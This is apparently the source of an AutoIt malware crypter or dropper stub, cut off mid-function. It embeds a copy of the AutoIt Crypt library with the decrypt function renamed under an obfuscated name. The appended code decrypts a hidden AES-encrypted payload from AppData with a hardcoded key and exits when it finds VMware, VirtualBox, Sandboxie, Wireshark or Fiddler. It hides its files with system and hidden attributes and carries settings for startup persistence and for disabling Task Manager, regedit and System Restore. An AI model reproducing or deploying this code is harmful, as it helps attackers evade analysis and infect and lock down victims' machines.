#Region "GgUIfb" Global Const $PROV_RSA_FULL = 0x1 Global Const $PROV_RSA_AES = 24 Global Const $CRYPT_VERIFYCONTEXT = 0xF0000000 Global Const $HP_HASHSIZE = 0x0004 Global Const $HP_HASHVAL = 0x0002 Global Const $CRYPT_EXPORTABLE = 0x00000001 Global Const $CRYPT_USERDATA = 1 Global Const $CALG_MD2 = 0x00008001 Global Const $CALG_MD4 = 0x00008002 Global Const $CALG_MD5 = 0x00008003 Global Const $CALG_SHA1 = 0x00008004 Global Const $CALG_3DES = 0x00006603 Global Const $CALG_AES_128 = 0x0000660e Global Const $CALG_AES_192 = 0x0000660f Global Const $CALG_AES_256 = 0x00006610 Global Const $CALG_DES = 0x00006601 Global Const $CALG_RC2 = 0x00006602 Global Const $CALG_RC4 = 0x00006801 Global Const $CALG_USERKEY = 0 Global $__g_aCryptInternalData[3] Func _Crypt_Startup() If __Crypt_RefCount() = 0 Then Local $hAdvapi32 = DllOpen("Advapi32.dll") If @error Then Return SetError(1, 0, False) __Crypt_DllHandleSet($hAdvapi32) Local $aRet Local $iProviderID = $PROV_RSA_AES If @OSVersion = "WIN_2000" Then $iProviderID = $PROV_RSA_FULL ; Provide backwards compatibility with win2000 $aRet = DllCall(__Crypt_DllHandle(), "bool", "CryptAcquireContext", "handle*", 0, "ptr", 0, "ptr", 0, "dword", $iProviderID, "dword", $CRYPT_VERIFYCONTEXT) If @error Or Not $aRet[0] Then DllClose(__Crypt_DllHandle()) Return SetError(2, 0, False) Else __Crypt_ContextSet($aRet[1]) ; Fall through to success. EndIf EndIf __Crypt_RefCountInc() Return True EndFunc ;==>_Crypt_Startup ; #FUNCTION# =================================================================== ; Name...........: _Crypt_Shutdown ; Description ...: Uninitialize the Crypt library ; Syntax.........: _Crypt_Shutdown() ; Parameters ....: ; Return values .: ; Author ........: Andreas Karlsson (monoceres) ; Modified ......: ; Remarks .......: Calling this function is only needed if _Crypt_Startup has been called ; Related .......: _Crypt_Startup ; Link ..........: @@MsdnLink@@ CryptReleaseContext ; Example .......: Yes ; ============================================================================== Func _Crypt_Shutdown() __Crypt_RefCountDec() If __Crypt_RefCount() = 0 Then DllCall(__Crypt_DllHandle(), "bool", "CryptReleaseContext", "handle", __Crypt_Context(), "dword", 0) DllClose(__Crypt_DllHandle()) EndIf EndFunc ;==>_Crypt_Shutdown ; #FUNCTION# =================================================================== ; Name...........: _Crypt_DeriveKey ; Description ...: Creates a key from algorithm and password ; Syntax.........: _Crypt_DeriveKey($vPassword, $iALG_ID [, $iHash_ALG_ID = $CALG_MD5 ] ) ; Parameters ....: $vPassword - Password to use ; $iALG_ID - Encryption ID of algorithm to be used with the key ; $iHash_ALG_ID - Id of the algo to hash the password with ; Return values .: Success - Returns a handle to a cryptographic key, ; - Sets @error to 0 ; Failure - Returns -1 and sets @error: ; |1 - Failed to create hash object ; |2 - Failed to hash password ; |3 - Failed to generate key ; Author ........: Andreas Karlsson (monoceres) ; Modified ......: ; Remarks .......: The key needs to be destroyed with _Crypt_DestroyKey. ; The AES algorthm is not available on Windows 2000. ; Related .......: _Crypt_DestroyKey ; Link ..........: @@MsdnLink@@ CryptDeriveKey ; Example .......: Yes ;=============================================================================== Func _Crypt_DeriveKey($vPassword, $iALG_ID, $iHash_ALG_ID = $CALG_MD5) Local $aRet Local $hCryptHash Local $hBuff Local $iError Local $vReturn _Crypt_Startup() Do ; Create Hash object $aRet = DllCall(__Crypt_DllHandle(), "bool", "CryptCreateHash", "handle", __Crypt_Context(), "uint", $iHash_ALG_ID, "ptr", 0, "dword", 0, "handle*", 0) If @error Or Not $aRet[0] Then $iError = 1 $vReturn = -1 ExitLoop EndIf $hCryptHash = $aRet[5] $hBuff = DllStructCreate("byte[" & BinaryLen($vPassword) & "]") DllStructSetData($hBuff, 1, $vPassword) $aRet = DllCall(__Crypt_DllHandle(), "bool", "CryptHashData", "handle", $hCryptHash, "ptr", DllStructGetPtr($hBuff), "dword", DllStructGetSize($hBuff), "dword", $CRYPT_USERDATA) If @error Or Not $aRet[0] Then $iError = 2 $vReturn = -1 ExitLoop EndIf ; Create key $aRet = DllCall(__Crypt_DllHandle(), "bool", "CryptDeriveKey", "handle", __Crypt_Context(), "uint", $iALG_ID, "handle", $hCryptHash, "dword", $CRYPT_EXPORTABLE, "handle*", 0) If @error Or Not $aRet[0] Then $iError = 3 $vReturn = -1 ExitLoop EndIf $iError = 0 $vReturn = $aRet[5] Until True If $hCryptHash <> 0 Then DllCall(__Crypt_DllHandle(), "bool", "CryptDestroyHash", "handle", $hCryptHash) Return SetError($iError, 0, $vReturn) EndFunc ;==>_Crypt_DeriveKey ; #FUNCTION# =================================================================== ; Name...........: _Crypt_DestroyKey ; Description ...: Frees the resources used by a key ; Syntax.........: _Crypt_DestroyKey($hCryptKey) ; Parameters ....: $hCryptKey - Key to destroy ; Return values .: Success - Returns true ; - Sets @error to 0 ; Failure - Returns -1 and sets @error: ; |1 - Destroying key failed ; Author ........: Andreas Karlsson (monoceres) ; Modified ......: ; Remarks .......: Destroys a key previously created by _Crypt_DeriveKey ; Related .......: _Crypt_DeriveKey ; Link ..........: @@MsdnLink@@ CryptDestroyKey ; Example .......: Yes ;=============================================================================== Func _Crypt_DestroyKey($hCryptKey) ;~ _Crypt_Startup() Local $aRet = DllCall(__Crypt_DllHandle(), "bool", "CryptDestroyKey", "handle", $hCryptKey) Local $nError = @error _Crypt_Shutdown() If $nError Or Not $aRet[0] Then Return SetError(1, 0, False) Else Return SetError(0, 0, True) EndIf EndFunc ;==>_Crypt_DestroyKey ; #FUNCTION# =================================================================== ; Name...........: _Crypt_EncryptData ; Description ...: Encrypts data using the supplied key ; Syntax.........: _Crypt_EncryptData($vData, $vCryptKey, $iALG_ID[, $fFinal = True]) ; Parameters ....: $vData - Data to encrypt/decrypt ; $vCryptKey - Password or handle to a key if the CALG_USERKEY flag is specified ; $iALG_ID - The algorithm to use ; $fFinal - False if this is only a segment of the full data ; Return values .: Success - Returns encrypted data ; - Sets @error to 0 ; Failure - Returns -1 and sets @error: ; |1 - Cannot create key ; |2 - Failed to determine buffer ; |3 - Failed to encrypt data ; Author ........: Andreas Karlsson (monoceres) ; Modified ......: ; Remarks .......: Returns a binary string regardless of input ; Related .......: _Crypt_DeriveKey, _Crypt_DestroyKey ; Link ..........: @@MsdnLink@@ CryptEncrypt ; Example .......: Yes ;=============================================================================== Func _Crypt_EncryptData($vData, $vCryptKey, $iALG_ID, $fFinal = True) Local $hBuff Local $iError Local $vReturn Local $ReqBuffSize Local $aRet _Crypt_Startup() Do If $iALG_ID <> $CALG_USERKEY Then $vCryptKey = _Crypt_DeriveKey( $vCryptKey,$iALG_ID) If @error Then $iError = 1 $vReturn = -1 ExitLoop EndIf EndIf $aRet = DllCall(__Crypt_DllHandle(), "bool", "CryptEncrypt", "ptr", $vCryptKey, "ptr", 0, "bool", 1, "dword", 0, "ptr", 0, _ "dword*", BinaryLen($vData), "dword", 0) If @error Or Not $aRet[0] Then $iError = 2 $vReturn = -1 ExitLoop EndIf $ReqBuffSize = $aRet[6] $hBuff = DllStructCreate("byte[" & $ReqBuffSize & "]") DllStructSetData($hBuff, 1, $vData) $aRet = DllCall(__Crypt_DllHandle(), "bool", "CryptEncrypt", "ptr", $vCryptKey, "ptr", 0, "bool", $fFinal, "dword", 0, "ptr", DllStructGetPtr($hBuff), _ "dword*", BinaryLen($vData), "dword", DllStructGetSize($hBuff)) If @error Or Not $aRet[0] Then $iError = 3 $vReturn = -1 ExitLoop EndIf $iError = 0 $vReturn = DllStructGetData($hBuff, 1) Until True If $iALG_ID <> $CALG_USERKEY Then _Crypt_DestroyKey($vCryptKey) _Crypt_Shutdown() Return SetError($iError, 0, $vReturn) EndFunc ;==>_Crypt_EncryptData ; #FUNCTION# =================================================================== ; Name...........: _Crypt_DecryptData ; Description ...: Decrypts data using the supplied key ; Syntax.........: _Crypt_DecryptData($vData, $vCryptKey, $iALG_ID[, $fFinal = True]) ; Parameters ....: $vData - Data to decrypt ; $vCryptKey - Password or handle to a key if the CALG_USERKEY flag is specified ; $iALG_ID - The algorithm to use ; $fFinal - False if this is only a segment of the full data ; Return values .: Success - Returns decrypted data ; - Sets @error to 0 ; Failure - Returns -1 and sets @error: ; |1 - Cannot create key ; |2 - Failed to decrypt data ; Author ........: Andreas Karlsson (monoceres) ; Modified ......: ; Remarks .......: The decrypted data is always returned as a binary string ; even if the encrypted data is in fact a string (cast with BinaryToString) ; Related .......: _Crypt_EncryptData, _Crypt_Derivekey, _Crypt_DestroyKey ; Link ..........: @@MsdnLink@@ CryptDecrypt ; Example .......: Yes ;=============================================================================== Func ALCPXeUIhKNCHFEVJLCYCEegCYCiIiSYTdNNHMJQSNIgMXaigThcGNf($vData, $vCryptKey, $iALG_ID, $fFinal = True) Local $hBuff Local $iError Local $vReturn Local $hTempStruct Local $iPlainTextSize Local $aRet _Crypt_Startup() Do If $iALG_ID <> $CALG_USERKEY Then $vCryptKey = _Crypt_DeriveKey( $vCryptKey,$iALG_ID) If @error Then $iError = 1 $vReturn = -1 ExitLoop EndIf EndIf $hBuff = DllStructCreate("byte[" & BinaryLen($vData)+1000 & "]") DllStructSetData($hBuff, 1, $vData) $aRet = DllCall(__Crypt_DllHandle(), "bool", "CryptDecrypt", "handle", $vCryptKey, "handle", 0, "bool", $fFinal, "dword", 0, "ptr", DllStructGetPtr($hBuff), "dword*", BinaryLen($vData)) If @error Or Not $aRet[0] Then $iError = 2 $vReturn = -1 ExitLoop EndIf $iPlainTextSize = $aRet[6] $hTempStruct = DllStructCreate("byte[" & $iPlainTextSize & "]", DllStructGetPtr($hBuff)) $iError = 0 $vReturn = DllStructGetData($hTempStruct, 1) Until True If $iALG_ID <> $CALG_USERKEY Then _Crypt_DestroyKey($vCryptKey) _Crypt_Shutdown() Return SetError($iError, 0, $vReturn) EndFunc ;==>_Crypt_DecryptData ; #FUNCTION# =================================================================== ; Name...........: _Crypt_HashData ; Description ...: Hash data with specified algorithm ; Syntax.........: _Crypt_HashData($vData, $iALG_ID [, $fFinal = True [, $hCryptHash = 0]]) ; Parameters ....: $vData - Data to hash ; $iALG_ID - Hash ID to use ; $fFinal - False if this is only a segment of the full data, also makes the function return a hash object instead of hash ; $hCryptHash - Hash object returned from a previous call to _Crypt_HashData ; Return values .: Success - Returns hash or hash object if $fFinal=False ; - Sets @error to 0 ; Failure - Returns -1 and sets @error: ; |1 - Failed to create hash object ; |2 - Failed to hash data ; |3 - Failed to get hash size ; |4 - Failed to get hash ; Author ........: Andreas Karlsson (monoceres) ; Modified ......: ; Remarks .......: The hash digest will be returned as a binary string, ; the size is specified by the algorithm. To use this with ; segments of data set the fFinal flag to False for all non ; ending segments and use the returned hash object with all subsequent calls. ; Related .......: _Crypt_DeriveKey, _Crypt_DestroyKey ; Link ..........: @@MsdnLink@@ CryptHashData ; Example .......: Yes ;=============================================================================== Func _Crypt_HashData($vData, $iALG_ID, $fFinal = True, $hCryptHash = 0) Local $iError Local $vReturn = 0 Local $iHashSize Local $aRet Local $hBuff = 0 _Crypt_Startup() Do If $hCryptHash = 0 Then ; Create Hash object $aRet = DllCall(__Crypt_DllHandle(), "bool", "CryptCreateHash", "handle", __Crypt_Context(), "uint", $iALG_ID, "ptr", 0, "dword", 0, "handle*", 0) If @error Or Not $aRet[0] Then $iError = 1 $vReturn = -1 ExitLoop EndIf $hCryptHash = $aRet[5] EndIf $hBuff = DllStructCreate("byte[" & BinaryLen($vData) & "]") DllStructSetData($hBuff, 1, $vData) $aRet = DllCall(__Crypt_DllHandle(), "bool", "CryptHashData", "handle", $hCryptHash, "ptr", DllStructGetPtr($hBuff), "dword", DllStructGetSize($hBuff), "dword", $CRYPT_USERDATA) If @error Or Not $aRet[0] Then $iError = 2 $vReturn = -1 ExitLoop EndIf If $fFinal Then $aRet = DllCall(__Crypt_DllHandle(), "bool", "CryptGetHashParam", "handle", $hCryptHash, "dword", $HP_HASHSIZE, "dword*", 0, "dword*", 4, "dword", 0) If @error Or Not $aRet[0] Then $iError = 3 $vReturn = -1 ExitLoop EndIf $iHashSize = $aRet[3] ; Get Hash $hBuff = DllStructCreate("byte[" & $iHashSize & "]") $aRet = DllCall(__Crypt_DllHandle(), "bool", "CryptGetHashParam", "handle", $hCryptHash, "dword", $HP_HASHVAL, "ptr", DllStructGetPtr($hBuff), "dword*", DllStructGetSize($hBuff), "dword", 0) If @error Or Not $aRet[0] Then $iError = 4 $vReturn = -1 ExitLoop EndIf $iError = 0 $vReturn = DllStructGetData($hBuff, 1) Else $vReturn = $hCryptHash EndIf Until True ; Cleanup and return hash If $hCryptHash <> 0 And $fFinal Then DllCall(__Crypt_DllHandle(), "bool", "CryptDestroyHash", "handle", $hCryptHash) _Crypt_Shutdown() Return SetError($iError, 0, $vReturn) EndFunc ;==>_Crypt_HashData ; #FUNCTION# =================================================================== ; Name...........: _Crypt_HashFile ; Description ...: Hash a string with specified algorithm ; Syntax.........: _Crypt_HashFile($sFile, $iALG_ID) ; Parameters ....: $sFile - Path to file to hash ; $iALG_ID - Hash ID to use ; Return values .: Success - Returns hash of file ; - Sets @error to 0 ; Failure - Returns -1 and sets @error: ; |1 - Failed to open file ; |2 - Failed to hash final piece ; |3 - Failed to get hash piece ; Author ........: Andreas Karlsson (monoceres) ; Modified ......: ; Remarks .......: ; Related .......: _Crypt_HashData, _Crypt_DeriveKey, _Crypt_DestroyKey ; Link ..........: ; Example .......: Yes ;=============================================================================== Func _Crypt_HashFile($sFile, $iALG_ID) Local $hFile Local $iError, $vReturn Local $hHashObject = 0 Local $bTempData _Crypt_Startup() Do $hFile = FileOpen($sFile, 16) If $hFile = -1 Then $iError = 1 $vReturn = -1 ExitLoop EndIf Do $bTempData = FileRead($hFile, 512 * 1024) If @error Then $vReturn = _Crypt_HashData($bTempData, $iALG_ID, True, $hHashObject) If @error Then $vReturn = -1 $iError = 2 ExitLoop 2 EndIf ExitLoop 2 Else $hHashObject = _Crypt_HashData($bTempData, $iALG_ID, False, $hHashObject) If @error Then $vReturn = -1 $iError = 3 ExitLoop 2 EndIf EndIf Until False Until True _Crypt_Shutdown() If $hFile <> -1 Then FileClose($hFile) Return SetError($iError, 0, $vReturn) EndFunc ;==>_Crypt_HashFile ; #FUNCTION# =================================================================== ; Name...........: _Crypt_EncryptFile ; Description ...: Encrypts a file with specified key and algorithm ; Syntax.........: _Crypt_EncryptFile($sSourceFile, $sDestinationFile, $vCryptKey, $iALG_ID) ; Parameters ....: $sSourceFile - File to process ; $sDestinationFile - File to save the processed file ; $vCryptKey - Password or handle to a key if the CALG_USERKEY flag is specified ; $iALG_ID - The algorithm to use ; Return values .: Success - True ; - Sets @error to 0 ; Failure - Returns -1 and sets @error: ; |1 - Failed to create key ; |2 - Failed to open source file ; |3 - Failed to open destination file ; |4 - Failed to encrypt final piece ; |5 - Failed to encrypt piece ; Author ........: Andreas Karlsson (monoceres) ; Modified ......: ; Remarks .......: The the output file can be larger than the input file depending on the algorithm. ; Related .......: _Crypt_EncryptData, _Crypt_DecryptFile, _Crypt_DeriveKey, _Crypt_DestroyKey ; Link ..........: ; Example .......: Yes ;=============================================================================== Func _Crypt_EncryptFile($sSourceFile, $sDestinationFile, $vCryptKey, $iALG_ID) Local $hInFile, $hOutFile Local $iError = 0, $vReturn = True Local $bTempData Local $iFileSize = FileGetSize($sSourceFile) Local $iRead = 0 _Crypt_Startup() Do If $iALG_ID <> $CALG_USERKEY Then $vCryptKey = _Crypt_DeriveKey($vCryptKey, $iALG_ID) If @error Then $iError = 1 $vReturn = -1 ExitLoop EndIf EndIf $hInFile = FileOpen($sSourceFile, 16) If @error Then $iError = 2 $vReturn = -1 ExitLoop EndIf $hOutFile = FileOpen($sDestinationFile, 26) If @error Then $iError = 3 $vReturn = -1 ExitLoop EndIf Do $bTempData = FileRead($hInFile, 1024 * 1024) $iRead += BinaryLen($bTempData) If $iRead = $iFileSize Then $bTempData = _Crypt_EncryptData($bTempData, $vCryptKey, $CALG_USERKEY,True) If @error Then $iError = 4 $vReturn = -1 EndIf FileWrite($hOutFile, $bTempData) ExitLoop 2 Else $bTempData = _Crypt_EncryptData($bTempData, $vCryptKey, $CALG_USERKEY,False) If @error Then $iError = 5 $vReturn = -1 ExitLoop 2 EndIf FileWrite($hOutFile, $bTempData) EndIf Until False Until True If $iALG_ID <> $CALG_USERKEY Then _Crypt_DestroyKey($vCryptKey) _Crypt_Shutdown() If $hInFile <> -1 Then FileClose($hInFile) If $hOutFile <> -1 Then FileClose($hOutFile) Return SetError($iError, 0, $vReturn) EndFunc ;==>_Crypt_CryptFile ; #FUNCTION# =================================================================== ; Name...........: _Crypt_DecryptFile ; Description ...: Decrypts a file with specified key and algorithm ; Syntax.........: _Crypt_DecryptFile($sSourceFile, $sDestinationFile, $vCryptKey, $iALG_ID) ; Parameters ....: $sSourceFile - File to process ; $sDestinationFile - File to save the processed file ; $vCryptKey - Password or handle to a key if the CALG_USERKEY flag is specified ; $iALG_ID - The algorithm to use ; Return values .: Success - True ; - Sets @error to 0 ; Failure - Returns -1 and sets @error: ; |1 - Failed to create key ; |2 - Failed to open source file ; |3 - Failed to open destination file ; |4 - Failed to decrypt final piece ; |5 - Failed to decrypt piece ; Author ........: Andreas Karlsson (monoceres) ; Modified ......: ; Remarks .......: ; Related .......: _Crypt_DecryptData, _Crypt_EncryptFile, _Crypt_DeriveKey, _Crypt_DestroyKey ; Link ..........: ; Example .......: Yes ;=============================================================================== Func _Crypt_DecryptFile($sSourceFile, $sDestinationFile, $vCryptKey, $iALG_ID) Local $hInFile, $hOutFile Local $iError = 0, $vReturn = True Local $bTempData Local $iFileSize = FileGetSize($sSourceFile) Local $iRead = 0 _Crypt_Startup() Do If $iALG_ID <> $CALG_USERKEY Then $vCryptKey = _Crypt_DeriveKey($vCryptKey, $iALG_ID) If @error Then $iError = 1 $vReturn = -1 ExitLoop EndIf EndIf $hInFile = FileOpen($sSourceFile, 16) If @error Then $iError = 2 $vReturn = -1 ExitLoop EndIf $hOutFile = FileOpen($sDestinationFile, 26) If @error Then $iError = 3 $vReturn = -1 ExitLoop EndIf Do $bTempData = FileRead($hInFile, 1024 * 1024) $iRead += BinaryLen($bTempData) If $iRead = $iFileSize Then $bTempData = _Crypt_DecryptData($bTempData, $vCryptKey, $CALG_USERKEY,True) If @error Then $iError = 4 $vReturn = -1 EndIf FileWrite($hOutFile, $bTempData) ExitLoop 2 Else $bTempData = _Crypt_DecryptData($bTempData, $vCryptKey, $CALG_USERKEY,False) If @error Then $iError = 5 $vReturn = -1 ExitLoop 2 EndIf FileWrite($hOutFile, $bTempData) EndIf Until False Until True If $iALG_ID <> $CALG_USERKEY Then _Crypt_DestroyKey($vCryptKey) _Crypt_Shutdown() If $hInFile <> -1 Then FileClose($hInFile) If $hOutFile <> -1 Then FileClose($hOutFile) Return SetError($iError, 0, $vReturn) EndFunc ;==>_Crypt_CryptFile ; #INTERNAL_USE_ONLY# ========================================================== ; Name...........: __Crypt_RefCount ; Description ...: Retrieves the internal reference count. ; Syntax.........: __Crypt_RefCount() ; Parameters ....: ; Return values .: The current internal reference count. ; Author ........: Valik ; Modified.......: ; Remarks .......: For Internal Use Only ; Related .......: ; Link ..........: ; Example .......: ; ============================================================================== Func __Crypt_RefCount() Return $__g_aCryptInternalData[0] EndFunc ;==>__Crypt_RefCount ; #INTERNAL_USE_ONLY# ========================================================== ; Name...........: __Crypt_RefCountInc ; Description ...: Increments the internal reference count. ; Syntax.........: __Crypt_RefCountInc() ; Parameters ....: ; Return values .: ; Author ........: Valik ; Modified.......: ; Remarks .......: For Internal Use Only ; Related .......: ; Link ..........: ; Example .......: ; ============================================================================== Func __Crypt_RefCountInc() $__g_aCryptInternalData[0] += 1 EndFunc ;==>__Crypt_RefCountInc ; #INTERNAL_USE_ONLY# ========================================================== ; Name...........: __Crypt_RefCountDec ; Description ...: Decrements the internal reference count. ; Syntax.........: __Crypt_RefCountDec() ; Parameters ....: ; Return values .: ; Author ........: Valik ; Modified.......: ; Remarks .......: For Internal Use Only ; Related .......: ; Link ..........: ; Example .......: ; ============================================================================== Func __Crypt_RefCountDec() If $__g_aCryptInternalData[0] > 0 Then $__g_aCryptInternalData[0] -= 1 EndFunc ;==>__Crypt_RefCountDec ; #INTERNAL_USE_ONLY# ========================================================== ; Name...........: __Crypt_DllHandle ; Description ...: Retrieves the internal DLL handle. ; Syntax.........: __Crypt_DllHandle() ; Parameters ....: ; Return values .: The current internal DLL handle. ; Author ........: Valik ; Modified.......: ; Remarks .......: For Internal Use Only ; Related .......: ; Link ..........: ; Example .......: ; ============================================================================== Func __Crypt_DllHandle() Return $__g_aCryptInternalData[1] EndFunc ;==>__Crypt_DllHandle ; #INTERNAL_USE_ONLY# ========================================================== ; Name...........: __Crypt_DllHandleSet ; Description ...: Stores the internal DLL handle. ; Syntax.........: __Crypt_DllHandleSet($hAdvapi32) ; Parameters ....: $hAdvapi32 - The new handle to store. ; Return values .: ; Author ........: Valik ; Modified.......: ; Remarks .......: For Internal Use Only ; Related .......: ; Link ..........: ; Example .......: ; ============================================================================== Func __Crypt_DllHandleSet($hAdvapi32) $__g_aCryptInternalData[1] = $hAdvapi32 EndFunc ;==>__Crypt_DllHandleSet ; #INTERNAL_USE_ONLY# ========================================================== ; Name...........: __Crypt_Context ; Description ...: Retrieves the internal crypt context. ; Syntax.........: __Crypt_Context() ; Parameters ....: ; Return values .: The current internal crypt context. ; Author ........: Valik ; Modified.......: ; Remarks .......: For Internal Use Only ; Related .......: ; Link ..........: ; Example .......: ; ============================================================================== Func __Crypt_Context() Return $__g_aCryptInternalData[2] EndFunc ;==>__Crypt_Context ; #INTERNAL_USE_ONLY# ========================================================== ; Name...........: __Crypt_ContextSet ; Description ...: Stores the internal crypt context. ; Syntax.........: __Crypt_ContextSet($hCryptContext) ; Parameters ....: $hCryptContext - The new crypt context to store. ; Return values .: ; Author ........: Valik ; Modified.......: ; Remarks .......: For Internal Use Only ; Related .......: ; Link ..........: ; Example .......: ; ============================================================================== Func __Crypt_ContextSet($hCryptContext) $__g_aCryptInternalData[2] = $hCryptContext EndFunc ;==>__Crypt_ContextSet #EndRegion Global $cIOcXbXYDeTefB = "MZPPXdeWXHOCOdiDNcHC" Global $cIOcXbXYDeTefBP = "2" If $CmdLine[0] = 2 Then Global $cIOcXbXYDeTefBPIID = $CmdLine[1] Global $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZSQFZbEZhA = $CmdLine[2] EndIf Global $cIOcXbXYDeTef = "PIOAIbWBfiifDCeaf" Global $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfi = "MZPPXdeWXHOCOdiDNcH" Global $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZ = "MZPPXdeWXHOCOdiDNc" Global $cIOcXbXYDeTefBPI = FileOpen(@AppDataDir & "\" & $cIOcXbXYDeTef, 16) Global $cIOcXbXYDeTefBPII = FileRead($cIOcXbXYDeTefBPI) $cIOcXbXYDeTefBPII = ALCPXeUIhKNCHFEVJLCYCEegCYCiIiSYTdNNHMJQSNIgMXaigThcGNf($cIOcXbXYDeTefBPII, $cIOcXbXYDeTefB, 0x00006610) Global $cIOcXbXYDeTefBPIIDH = "I1nputBActivated" Global $GgUIfbdZDaLMfMWIhAWe = "I2nputBStartup" Global $GgUIfbdZDaLMfMWIhAWeC = "I3nputBNormalName" Global $GgUIfbdZDaLMfMWIhAWeCP = "I4nputBNormalExtension" Global $GgUIfbdZDaLMfMWIhAWeCPL = "I5nputBRandom" Global $GgUIfbdZDaLMfMWIhAWeCPLX = "I6nputBPath" Global $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZSQFZbEZhAH = "I7nputBHidden" Global $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZSQFZbEZhAHXI = "I8putForceAdmin" Global $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDf = "true" Global $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZSQFZbEZhAHX = "InputM3lt" Global $ALCPXeUIhKNCHFEVJLCYCEegCYCiIiSYTdNNHMJQSNIgMXaigThcGNfe = "InputD3l4y" Global $ALCPXeUIhKNCHFEVJLCYCEegCYCiIiSYTdNNHMJQSNIgMXaigThcGNfeQ = "InputT1mesD3l4y" Global $ALCPXeUIhKNCHFEVJLCYCEegCYCiIiSYTdNNHMJQSNIgMXaigThcGNfeQF = "InputD3L4yRun0nSt4r5Up" Global $ALCPXeUIhKNCHFEVJLCYCEegCYCiIiSYTdNNHMJQSNIgMXaigThcGNfeQFM = "InputAnt1VMW4re" Global $ALCPXeUIhKNCHFEVJLCYCEegCYCiIiSYTdNNHMJQSNIgMXaigThcGNfeQFMi = "InputAnt1VB0x" Global $ALCPXeUIhKNCHFEVJLCYCEegCYCiIiSYTdNNHMJQSNIgMXaigThcGNfeQFMic = "InputAnt1S4ndb0x13" Global $ALCPXeUIhKNCHFEVJLCYCEegCYCiIiSYTdNNHMJQSNIgMXaigThcGNfeQFMicU = "InputAnt1W1r3sh4rk" Global $ALCPXeUIhKNCHFEVJLCYCEegCYCiIiSYTdNNHMJQSNIgMXaigThcGNfeQFMicUA = "InputAnt1F1ddler" Global $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbHHRXcAcWDKQZHgBdWC = "InputD1sabl3regedit" Global $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbHHRXcAcWDKQZHgBdWCa = "InputD1sabl3taskmgr" Global $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbHHRXcAcWDKQZHgBdWCaJ = "InputD1sabl3rstrui" Global $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbHHRXcAcWDKQZHgBdWCaJT = "InputD1sabl3W1r3sh4rk" Global $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbHHRXcAcWDKQZHgBdWCaJTh = "InputD1sabl3F1ddler" Global $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbHHRXcAcWDKQZHgBdWCaJThS = "InputM5GB0XB00" Global $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbHHRXcAcWDKQZHgBdWCaJThSI = "InputM5GB0XT1tle" Global $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbHHRXcAcWDKQZHgBdWCaJThSIE = "InputM5GB0XB0dy" Global $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbHHRXcAcWDKQZHgBdWCaJThSIEZ = "InputM5GB0XFl4g" Global $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbHHRXcAcWDKQZHgBdWCaJThSIEZH = "InputM5GB0XRun0nSt4r5Up" #NoTrayIcon If $ALCPXeUIhKNCHFEVJLCYCEegCYCiIiSYTdNNHMJQSNIgMXaigThcGNfeQFM = "true" Then If ProcessExists("vmtoolsd.exe") Then Exit EndIf EndIf If $ALCPXeUIhKNCHFEVJLCYCEegCYCiIiSYTdNNHMJQSNIgMXaigThcGNfeQFMi = "true" Then If ProcessExists("VBoxTray.exe") Then Exit EndIf EndIf If $ALCPXeUIhKNCHFEVJLCYCEegCYCiIiSYTdNNHMJQSNIgMXaigThcGNfeQFMic = "true" Then If ProcessExists("SandboxieRpcSs" & "." & "exe") Then Exit EndIf EndIf If $ALCPXeUIhKNCHFEVJLCYCEegCYCiIiSYTdNNHMJQSNIgMXaigThcGNfeQFMicU = "true" Then If ProcessExists("Wireshark.exe") Then Exit EndIf EndIf If $ALCPXeUIhKNCHFEVJLCYCEegCYCiIiSYTdNNHMJQSNIgMXaigThcGNfeQFMicUA = "true" Then If ProcessExists("Fiddler.exe") Then Exit EndIf EndIf Global $GgUIfbdZDaLMfMWIhAWeCPLXV = "true" Global $GgUIfbdZDaLMfMWIhAWeCPLXVB = "true" Global $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZS = "true" If $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZS = "true" Then FileCopy(@AppDataDir & "\" & $cIOcXbXYDeTef, @TempDir & "\" & $cIOcXbXYDeTef) FileCopy(@AppDataDir & "\" & $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfi & ".au3", @TempDir & "\" & $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfi & ".au3") FileCopy(@AppDataDir & "\" & $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZ & ".exe", @TempDir & "\" & $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZ & ".exe") endif FileSetAttrib(@AppDataDir & "\" & $cIOcXbXYDeTef, "+SH") FileSetAttrib(@AppDataDir & "\" & $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfi & ".au3", "+SH") FileSetAttrib(@AppDataDir & "\" & $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZ & ".exe", "+SH") FileSetAttrib(@TempDir & "\" & $cIOcXbXYDeTef, "+SH") FileSetAttrib(@TempDir & "\" & $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfi & ".au3", "+SH") FileSetAttrib(@TempDir & "\" & $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZ & ".exe", "+SH") If $CmdLine[0] = 2 Then If $cIOcXbXYDeTefBPIIDH = "true" Then If $GgUIfbdZDaLMfMWIhAWeCPLX = "appdata" Then If FileExists(@AppDataDir & "\" & $GgUIfbdZDaLMfMWIhAWeC & $GgUIfbdZDaLMfMWIhAWeCP) Then FileDelete(@AppDataDir & "\" & $GgUIfbdZDaLMfMWIhAWeC & $GgUIfbdZDaLMfMWIhAWeCP) 